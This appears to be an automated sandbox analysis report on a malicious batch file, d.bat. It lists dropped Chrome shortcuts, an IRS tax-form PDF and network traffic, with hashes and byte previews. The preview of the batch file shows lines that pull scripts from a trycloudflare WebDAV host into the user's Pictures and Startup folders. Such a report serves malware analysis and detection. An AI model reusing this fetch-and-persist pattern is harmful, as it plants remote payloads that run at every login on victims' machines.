                              Preview:L..................F.@.. ...$+.,.......0....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.i....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.i....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.i....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.i..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.i...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........~........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 12:12:14 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2679
                              Entropy (8bit):3.9964520526391043
                              Encrypted:false
                              SSDEEP:48:8XdTTbv/HfidAKZdA1weh/iZUkAQkqehcy+2:8hvL9Qxy
                              MD5:0B22EEDC6B1CCA6D3BB36C5BBB003281
                              SHA1:33AEA8DEEA16BD79F4D842A09EBC80FD3B4C48BD
                              SHA-256:44F46499CA12F045F05C055D8954A40C7435D8A1BBA7A48748337511160BC2E8
                              SHA-512:8011B69C32DAFABD622256782F8F5FEB57516682EF36E0EAB3E0B8B54A8BCF8A3FAF81191CE8F0CA2A4887D8C9DE8508B60EBD99514FE9EF62DFB884C7D805F0
                              Malicious:false
                              Reputation:low
                              Preview:L..................F.@.. ...$+.,.......0....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.i....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.i....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.i....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.i..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.i...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........~........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2693
                              Entropy (8bit):4.005135031376133
                              Encrypted:false
                              SSDEEP:48:8xYdTTbvsHfidAKZdA14tseh7sFiZUkmgqeh7s6y+BX:8xkvenoy
                              MD5:02D36C96E61D2D6DB3D1036FC17A3B41
                              SHA1:B5EF61F0A62490E062FA117234B6B76D49F3129E
                              SHA-256:AF0B7FD9A2A4F737875881998AFBC6773CEEA3E15E0773A6E62B55E31A25017E
                              SHA-512:AB18C13A96040FF052347FB4FF9A73A62B0E9F24C43E952EF4F2C0A3887DF5B371F22DDA4FBDE3D7591F220E388A2C538B67502CC85E9EA14F2C598C8A34D604
                              Malicious:false
                              Reputation:low
                              Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.i....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.i....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.i....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.i..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........~........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 12:12:14 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2681
                              Entropy (8bit):3.994808721032563
                              Encrypted:false
                              SSDEEP:48:83dTTbv/HfidAKZdA1vehDiZUkwqehQy+R:8BvIiy
                              MD5:4A589436D7814F2752332896E780BCF6
                              SHA1:9DD685FDD5E2169FF8F6E091DF1ABD4567FC0E3D
                              SHA-256:9788822CEC6318EFD8BDD6CA3B76A17A2B6EBE4920828263CC11D44FA6EE435F
                              SHA-512:C67503BF16E541890F0B60E0660C5B169C12CCC9D38D50995BF486780AFF012AEF0BFE9423528491B26137B5A25BF757FFBE549ECE3C08DCE73251D6C8EA0833
                              Malicious:false
                              Reputation:low
                              Preview:L..................F.@.. ...$+.,.....'.0....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.i....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.i....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.i....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.i..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.i...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........~........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 12:12:14 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2681
                              Entropy (8bit):3.982313351680813
                              Encrypted:false
                              SSDEEP:48:8VdTTbv/HfidAKZdA1hehBiZUk1W1qehWy+C:8bvY92y
                              MD5:E759CB25D380344C1C6A21399CF1AFDA
                              SHA1:D7C165407AD27C21C05EA4ED23E3BBCAAB1ABF75
                              SHA-256:3FD51442EF5B087FC9FB9151100F5640A9AD5CA372F474A05C6EB06DC13CD98C
                              SHA-512:62567050358C6B29CA1032BFC1D984B549BA5028710CFF2D7A614D40ED4848E8D9080BA9CFF273EB63D3ED36A0D159AC3BE476DB018C43645A73D087828BECC6
                              Malicious:false
                              Reputation:low
                              Preview:L..................F.@.. ...$+.,......0....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.i....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.i....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.i....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.i..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.i...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........~........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 12:12:14 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2683
                              Entropy (8bit):3.994975715439732
                              Encrypted:false
                              SSDEEP:48:8rdTTbv/HfidAKZdA1duT+ehOuTbbiZUk5OjqehOuTboy+yT+:8dv2T/TbxWOvTboy7T
                              MD5:86A05180D598F0E54077A53792C74861
                              SHA1:6F363577612C01DAE4F2EF96E3A7EFAAD21AC16E
                              SHA-256:A08F1CB292EF7179B7D23D1E07CBDB46ED6C184C162F17F28CD91659273F5E5E
                              SHA-512:9860870C5B40A4ABA4D60D890E143FF22C5FBBDCAD0CA0D9D28CCAFC42BC1B3E651E4764796008C247A5443AD5AF2FDBD5FE26420DFBD1C365EB44EB06B07623
                              Malicious:false
                              Reputation:low
                              Preview:L..................F.@.. ...$+.,......0....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.i....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.i....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.i....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.i..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.i...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........~........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PDF document, version 1.7 (zip deflate encoded)
                              Category:dropped
                              Size (bytes):160747
                              Entropy (8bit):7.666827256964284
                              Encrypted:false
                              SSDEEP:3072:H+GB66G6WwUTsiJM+5vz6ZDuteRPuZ3W11D84LCBUlWEHKr:eU66GwUTBMI+uQRPugjyUl7Hk
                              MD5:5355B0C5DEB635C613B45246475123C2
                              SHA1:F00B85A4367F18DCE9D521935AEFD8B7B091735B
                              SHA-256:A410CE39E1F9B75AB3DDD8C314B9E7DCE022ED6E3AEBDE5418A58B88F1E0213C
                              SHA-512:C31D5ACACE5FB498144290BA71DA016CF0E8CA38B85A026B77E62A1CA6AF5C21631B2836B624531FC43377DA54881FA6559395ED2A6883EA4582BC5ED7BF6278
                              Malicious:false
                              Reputation:low
                              Preview:%PDF-1.7.%......1917 0 obj.<</Linearized 1/L 146653/O 1922/E 32492/N 2/T 146105/H [ 510 328]>>.endobj. ..1939 0 obj.<</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode/ID[<FDFCAE072B6B3F48B64BF338BDD0B74C><AED6AF0D71981F49AA2C3AAF15E12A57>]/Index[1917 46]/Info 1916 0 R/Length 104/Prev 146106/Root 1918 0 R/Size 1963/Type/XRef/W[1 2 1]>>stream..h.bbd.``b`6...<@..>...b..* ...H......@.u...."...K..u....H...... ...2y.......D.*.&Fv~ ......._........]..endstream.endobj.startxref..0..%%EOF...1962 0 obj.<</C 333/Filter/FlateDecode/I 355/Length 233/S 55/V 311>>stream..h.b```."..V...].......a.B.......&00.......q....aN........L.^....\|b..#.=.Uz..}..m.n...%......./..../.8.0o.dX..0....S.l..+.5....2N...7....7T..*.ax#.@.2......5|.J.d|.r ...g........j.XA..#....a`....m``<8.H.10....Na`....@d..`.9.Px..endstream.endobj.1918 0 obj.<</AcroForm 1940 0 R/Extensions<</ADBE<</BaseVersion/1.7/ExtensionLevel 11>>>>/Lang 1915 0 R/MarkInfo<</Marked true>>/Metadata 146 0 R/Names 1941 0 R/P
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PDF document, version 1.7 (zip deflate encoded)
                              Category:dropped
                              Size (bytes):160747
                              Entropy (8bit):7.666827256964284
                              Encrypted:false
                              SSDEEP:3072:H+GB66G6WwUTsiJM+5vz6ZDuteRPuZ3W11D84LCBUlWEHKr:eU66GwUTBMI+uQRPugjyUl7Hk
                              MD5:5355B0C5DEB635C613B45246475123C2
                              SHA1:F00B85A4367F18DCE9D521935AEFD8B7B091735B
                              SHA-256:A410CE39E1F9B75AB3DDD8C314B9E7DCE022ED6E3AEBDE5418A58B88F1E0213C
                              SHA-512:C31D5ACACE5FB498144290BA71DA016CF0E8CA38B85A026B77E62A1CA6AF5C21631B2836B624531FC43377DA54881FA6559395ED2A6883EA4582BC5ED7BF6278
                              Malicious:false
                              Reputation:low
                              Preview:%PDF-1.7.%......1917 0 obj.<</Linearized 1/L 146653/O 1922/E 32492/N 2/T 146105/H [ 510 328]>>.endobj. ..1939 0 obj.<</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode/ID[<FDFCAE072B6B3F48B64BF338BDD0B74C><AED6AF0D71981F49AA2C3AAF15E12A57>]/Index[1917 46]/Info 1916 0 R/Length 104/Prev 146106/Root 1918 0 R/Size 1963/Type/XRef/W[1 2 1]>>stream..h.bbd.``b`6...<@..>...b..* ...H......@.u...."...K..u....H...... ...2y.......D.*.&Fv~ ......._........]..endstream.endobj.startxref..0..%%EOF...1962 0 obj.<</C 333/Filter/FlateDecode/I 355/Length 233/S 55/V 311>>stream..h.b```."..V...].......a.B.......&00.......q....aN........L.^....\|b..#.=.Uz..}..m.n...%......./..../.8.0o.dX..0....S.l..+.5....2N...7....7T..*.ax#.@.2......5|.J.d|.r ...g........j.XA..#....a`....m``<8.H.10....Na`....@d..`.9.Px..endstream.endobj.1918 0 obj.<</AcroForm 1940 0 R/Extensions<</ADBE<</BaseVersion/1.7/ExtensionLevel 11>>>>/Lang 1915 0 R/MarkInfo<</Marked true>>/Metadata 146 0 R/Names 1941 0 R/P
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PDF document, version 1.7 (zip deflate encoded)
                              Category:dropped
                              Size (bytes):15750
                              Entropy (8bit):7.914947273324376
                              Encrypted:false
                              SSDEEP:384:/Pf8gkrYKx8cgfXuvsmVfvPfDlRESkV+2R/Ay9driE:/PobGB8HJ3fBGlB/pdeE
                              MD5:DC35DF0427D1F321441176368EBDAD93
                              SHA1:82CE46CEB10C5A6AA7308AF9A7418284C8251542
                              SHA-256:727B6B03E7996760F47669CC082083CB4FBAE095F5E3D33C98C1DB050F863359
                              SHA-512:CF4D276439DE5929AB7E88472B6DB03DE9BE2D1D86860592D09351681C7DD0B8956AE59746F0D6564264732FDAB54D20B3632A0531F13D2A4ECB5C63DFFFD07A
                              Malicious:false
                              Preview:%PDF-1.7.%......1917 0 obj.<</Linearized 1/L 146653/O 1922/E 32492/N 2/T 146105/H [ 510 328]>>.endobj. ..1939 0 obj.<</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode/ID[<FDFCAE072B6B3F48B64BF338BDD0B74C><AED6AF0D71981F49AA2C3AAF15E12A57>]/Index[1917 46]/Info 1916 0 R/Length 104/Prev 146106/Root 1918 0 R/Size 1963/Type/XRef/W[1 2 1]>>stream..h.bbd.``b`6...<@..>...b..* ...H......@.u...."...K..u....H...... ...2y.......D.*.&Fv~ ......._........]..endstream.endobj.startxref..0..%%EOF...1962 0 obj.<</C 333/Filter/FlateDecode/I 355/Length 233/S 55/V 311>>stream..h.b```."..V...].......a.B.......&00.......q....aN........L.^....\|b..#.=.Uz..}..m.n...%......./..../.8.0o.dX..0....S.l..+.5....2N...7....7T..*.ax#.@.2......5|.J.d|.r ...g........j.XA..#....a`....m``<8.H.10....Na`....@d..`.9.Px..endstream.endobj.1918 0 obj.<</AcroForm 1940 0 R/Extensions<</ADBE<</BaseVersion/1.7/ExtensionLevel 11>>>>/Lang 1915 0 R/MarkInfo<</Marked true>>/Metadata 146 0 R/Names 1941 0 R/P
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows icon resource - 2 icons, 16x16, 32x32
                              Category:dropped
                              Size (bytes):3638
                              Entropy (8bit):2.571036536899412
                              Encrypted:false
                              SSDEEP:24:OeP3VnSOcrTxoncyUjvAZgX7a7VFYuq8oPhhr2EsCtIDOLrie:ObDrTxtyUn7WPYXBCs
                              MD5:E7E7D53FDBC59F9B23B362F41FAD8990
                              SHA1:EBA944D3003861B1E114D8997C2979B003F68087
                              SHA-256:6D63881E43E08EF385E6C809B43B2B289A459FB2F30D5159000E2477D776B456
                              SHA-512:8ADED0EC6D8F1118CE33479CB16F60A9115948CF09C57DA38292E24DE13B3B5C3942B8E6AEC82769C555FB22BFCB1F91E773C4673E7B6A34F5701EFF0397E259
                              Malicious:false
                              Preview:..............h...&... ..............(....... ...........@............................yJ.{6......["...r.........J............[..g4..q?...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows icon resource - 2 icons, 16x16, 32x32
                              Category:downloaded
                              Size (bytes):3638
                              Entropy (8bit):2.571036536899412
                              Encrypted:false
                              SSDEEP:24:OeP3VnSOcrTxoncyUjvAZgX7a7VFYuq8oPhhr2EsCtIDOLrie:ObDrTxtyUn7WPYXBCs
                              MD5:E7E7D53FDBC59F9B23B362F41FAD8990
                              SHA1:EBA944D3003861B1E114D8997C2979B003F68087
                              SHA-256:6D63881E43E08EF385E6C809B43B2B289A459FB2F30D5159000E2477D776B456
                              SHA-512:8ADED0EC6D8F1118CE33479CB16F60A9115948CF09C57DA38292E24DE13B3B5C3942B8E6AEC82769C555FB22BFCB1F91E773C4673E7B6A34F5701EFF0397E259
                              Malicious:false
                              URL:https://www.irs.gov/themes/custom/pup_base/favicon.ico
                              Preview:..............h...&... ..............(....... ...........@............................yJ.{6......["...r.........J............[..g4..q?...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PDF document, version 1.7 (zip deflate encoded)
                              Category:downloaded
                              Size (bytes):160747
                              Entropy (8bit):7.666827256964284
                              Encrypted:false
                              SSDEEP:3072:H+GB66G6WwUTsiJM+5vz6ZDuteRPuZ3W11D84LCBUlWEHKr:eU66GwUTBMI+uQRPugjyUl7Hk
                              MD5:5355B0C5DEB635C613B45246475123C2
                              SHA1:F00B85A4367F18DCE9D521935AEFD8B7B091735B
                              SHA-256:A410CE39E1F9B75AB3DDD8C314B9E7DCE022ED6E3AEBDE5418A58B88F1E0213C
                              SHA-512:C31D5ACACE5FB498144290BA71DA016CF0E8CA38B85A026B77E62A1CA6AF5C21631B2836B624531FC43377DA54881FA6559395ED2A6883EA4582BC5ED7BF6278
                              Malicious:false
                              URL:https://www.irs.gov/pub/irs-pdf/f1040.pdf
                              Preview:%PDF-1.7.%......1917 0 obj.<</Linearized 1/L 146653/O 1922/E 32492/N 2/T 146105/H [ 510 328]>>.endobj. ..1939 0 obj.<</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode/ID[<FDFCAE072B6B3F48B64BF338BDD0B74C><AED6AF0D71981F49AA2C3AAF15E12A57>]/Index[1917 46]/Info 1916 0 R/Length 104/Prev 146106/Root 1918 0 R/Size 1963/Type/XRef/W[1 2 1]>>stream..h.bbd.``b`6...<@..>...b..* ...H......@.u...."...K..u....H...... ...2y.......D.*.&Fv~ ......._........]..endstream.endobj.startxref..0..%%EOF...1962 0 obj.<</C 333/Filter/FlateDecode/I 355/Length 233/S 55/V 311>>stream..h.b```."..V...].......a.B.......&00.......q....aN........L.^....\|b..#.=.Uz..}..m.n...%......./..../.8.0o.dX..0....S.l..+.5....2N...7....7T..*.ax#.@.2......5|.J.d|.r ...g........j.XA..#....a`....m``<8.H.10....Na`....@d..`.9.Px..endstream.endobj.1918 0 obj.<</AcroForm 1940 0 R/Extensions<</ADBE<</BaseVersion/1.7/ExtensionLevel 11>>>>/Lang 1915 0 R/MarkInfo<</Marked true>>/Metadata 146 0 R/Names 1941 0 R/P
                              File type:DOS batch file, ASCII text, with CRLF line terminators
                              Entropy (8bit):5.00221025750802
                              TrID:
                                File name:d.bat
                                File size:1'493 bytes
                                MD5:ff72478478ffdc769b1e68ebcae78ce7
                                SHA1:de0dcdc73c62b379b197f85665d0f79ffd503e8c
                                SHA256:37078a400954db8edd7717afb95f22d7fe119efedc4691bff4e7ca2470ece1c8
                                SHA512:ca5cb63cbc5661189d3c5191ce1d4b28f29496839a9a7cf31948141cec7e34e0aa7054e94c409fb8dfc900531516b9946f17c3764cb4224c5e4bce0616f368ff
                                SSDEEP:24:wh280zOMKuVMVxRbzrpQJkqgqy5eiQr9K5Hk0hSMXgGaOM+1wcTxnIdK9/ZDjeFv:k28qNKu6dpQJkq31jhK558TGeslxnIdr
                                TLSH:653103521808413A4337A7BAB73859EEE50A504FD200751975EDC5B60F3528DC7B6BE4
                                File Content Preview:@echo off..set source=\\hq-breach-alt-acknowledged.trycloudflare.com@SSL\DavWWWRoot..set destination=%USERPROFILE%\Pictures..set startup_folder=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup....REM Copy a.cmd, a.ps1, and ib.ps1 to the destination
                                Icon Hash:9686878b929a9886
                                TimestampSource PortDest PortSource IPDest IP
                                Apr 25, 2024 15:12:07.094077110 CEST49675443192.168.2.523.1.237.91
                                Apr 25, 2024 15:12:07.094077110 CEST49674443192.168.2.523.1.237.91
                                Apr 25, 2024 15:12:07.203501940 CEST49673443192.168.2.523.1.237.91
                                Apr 25, 2024 15:12:16.706228971 CEST49675443192.168.2.523.1.237.91
                                Apr 25, 2024 15:12:16.706229925 CEST49674443192.168.2.523.1.237.91
                                Apr 25, 2024 15:12:16.811434984 CEST49673443192.168.2.523.1.237.91
                                Apr 25, 2024 15:12:17.735681057 CEST49717443192.168.2.5142.250.9.104
                                Apr 25, 2024 15:12:17.735760927 CEST44349717142.250.9.104192.168.2.5
                                Apr 25, 2024 15:12:17.735836029 CEST49717443192.168.2.5142.250.9.104
                                Apr 25, 2024 15:12:17.736057997 CEST49717443192.168.2.5142.250.9.104
                                Apr 25, 2024 15:12:17.736093998 CEST44349717142.250.9.104192.168.2.5
                                Apr 25, 2024 15:12:17.979747057 CEST44349717142.250.9.104192.168.2.5
                                Apr 25, 2024 15:12:17.980123997 CEST49717443192.168.2.5142.250.9.104
                                Apr 25, 2024 15:12:17.980160952 CEST44349717142.250.9.104192.168.2.5
                                Apr 25, 2024 15:12:17.981527090 CEST44349717142.250.9.104192.168.2.5
                                Apr 25, 2024 15:12:17.981580019 CEST49717443192.168.2.5142.250.9.104
                                Apr 25, 2024 15:12:17.982920885 CEST49717443192.168.2.5142.250.9.104
                                Apr 25, 2024 15:12:17.982990980 CEST44349717142.250.9.104192.168.2.5
                                Apr 25, 2024 15:12:18.103143930 CEST49717443192.168.2.5142.250.9.104
                                Apr 25, 2024 15:12:18.103188992 CEST44349717142.250.9.104192.168.2.5
                                Apr 25, 2024 15:12:18.122967005 CEST49718443192.168.2.5184.31.62.93
                                Apr 25, 2024 15:12:18.123029947 CEST44349718184.31.62.93192.168.2.5
                                Apr 25, 2024 15:12:18.123106956 CEST49718443192.168.2.5184.31.62.93
                                Apr 25, 2024 15:12:18.125169039 CEST49718443192.168.2.5184.31.62.93
                                Apr 25, 2024 15:12:18.125205994 CEST44349718184.31.62.93192.168.2.5
                                Apr 25, 2024 15:12:18.181680918 CEST4434970323.1.237.91192.168.2.5
                                Apr 25, 2024 15:12:18.181787014 CEST49703443192.168.2.523.1.237.91
                                Apr 25, 2024 15:12:18.212440968 CEST49717443192.168.2.5142.250.9.104
                                Apr 25, 2024 15:12:18.361244917 CEST44349718184.31.62.93192.168.2.5
                                Apr 25, 2024 15:12:18.361368895 CEST49718443192.168.2.5184.31.62.93
                                Apr 25, 2024 15:12:18.364238977 CEST49718443192.168.2.5184.31.62.93
                                Apr 25, 2024 15:12:18.364262104 CEST44349718184.31.62.93192.168.2.5
                                Apr 25, 2024 15:12:18.364670992 CEST44349718184.31.62.93192.168.2.5
                                Apr 25, 2024 15:12:18.408225060 CEST49718443192.168.2.5184.31.62.93
                                Apr 25, 2024 15:12:18.421142101 CEST49718443192.168.2.5184.31.62.93
                                Apr 25, 2024 15:12:18.468147039 CEST44349718184.31.62.93192.168.2.5
                                Apr 25, 2024 15:12:18.570722103 CEST44349718184.31.62.93192.168.2.5
                                Apr 25, 2024 15:12:18.570868969 CEST44349718184.31.62.93192.168.2.5
                                Apr 25, 2024 15:12:18.570986986 CEST49718443192.168.2.5184.31.62.93
                                Apr 25, 2024 15:12:18.571048021 CEST49718443192.168.2.5184.31.62.93
                                Apr 25, 2024 15:12:18.571048021 CEST49718443192.168.2.5184.31.62.93
                                Apr 25, 2024 15:12:18.571086884 CEST44349718184.31.62.93192.168.2.5
                                Apr 25, 2024 15:12:18.571125984 CEST44349718184.31.62.93192.168.2.5
                                Apr 25, 2024 15:12:18.615158081 CEST49719443192.168.2.5184.31.62.93
                                Apr 25, 2024 15:12:18.615210056 CEST44349719184.31.62.93192.168.2.5
                                Apr 25, 2024 15:12:18.615410089 CEST49719443192.168.2.5184.31.62.93
                                Apr 25, 2024 15:12:18.615945101 CEST49719443192.168.2.5184.31.62.93
                                Apr 25, 2024 15:12:18.615961075 CEST44349719184.31.62.93192.168.2.5
                                Apr 25, 2024 15:12:18.844990969 CEST44349719184.31.62.93192.168.2.5
                                Apr 25, 2024 15:12:18.845079899 CEST49719443192.168.2.5184.31.62.93
                                Apr 25, 2024 15:12:18.860052109 CEST49719443192.168.2.5184.31.62.93
                                Apr 25, 2024 15:12:18.860079050 CEST44349719184.31.62.93192.168.2.5
                                Apr 25, 2024 15:12:18.860424042 CEST44349719184.31.62.93192.168.2.5
                                Apr 25, 2024 15:12:18.861485004 CEST49719443192.168.2.5184.31.62.93
                                Apr 25, 2024 15:12:18.908118963 CEST44349719184.31.62.93192.168.2.5
                                Apr 25, 2024 15:12:19.063371897 CEST44349719184.31.62.93192.168.2.5
                                Apr 25, 2024 15:12:19.063433886 CEST44349719184.31.62.93192.168.2.5
                                Apr 25, 2024 15:12:19.063513994 CEST49719443192.168.2.5184.31.62.93
                                Apr 25, 2024 15:12:19.064230919 CEST49719443192.168.2.5184.31.62.93
                                Apr 25, 2024 15:12:19.064256907 CEST44349719184.31.62.93192.168.2.5
                                Apr 25, 2024 15:12:19.064270973 CEST49719443192.168.2.5184.31.62.93
                                Apr 25, 2024 15:12:19.064280033 CEST44349719184.31.62.93192.168.2.5
                                Apr 25, 2024 15:12:27.958633900 CEST44349717142.250.9.104192.168.2.5
                                Apr 25, 2024 15:12:27.958703995 CEST44349717142.250.9.104192.168.2.5
                                Apr 25, 2024 15:12:27.958787918 CEST49717443192.168.2.5142.250.9.104
